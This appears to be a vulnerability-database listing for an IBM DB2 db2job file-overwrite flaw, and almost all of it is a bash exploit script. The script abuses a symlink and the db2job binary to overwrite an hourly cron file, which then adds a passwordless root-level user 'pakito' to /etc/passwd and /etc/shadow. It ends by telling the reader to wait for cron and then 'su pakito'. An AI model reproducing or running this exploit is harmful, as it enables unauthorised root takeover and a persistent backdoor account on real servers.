|
IBM DB2 db2job File Overwrite Vulnerability
EXPLOIT #!/bin/bash DB2JOB=/home/db2as/sqllib/adm/db2job CRONFILE=/etc/cron.hourly/pakito USER=pakito unset DB2INSTANCE export DB2DIR=./trash if [ -d $DB2DIR ]; then echo Trash directory already created else mkdir $DB2DIR fi cd $DB2DIR if [ -f ./0_1.out ]; then echo Link Already Created else ln -s $CRONFILE ./0_1.out fi $DB2JOB echo "echo "#!/bin/bash"" > $CRONFILE echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE echo " must wait until cron execute $CRONFILE and then exec su pakito" |
|
|
Privacy Statement |
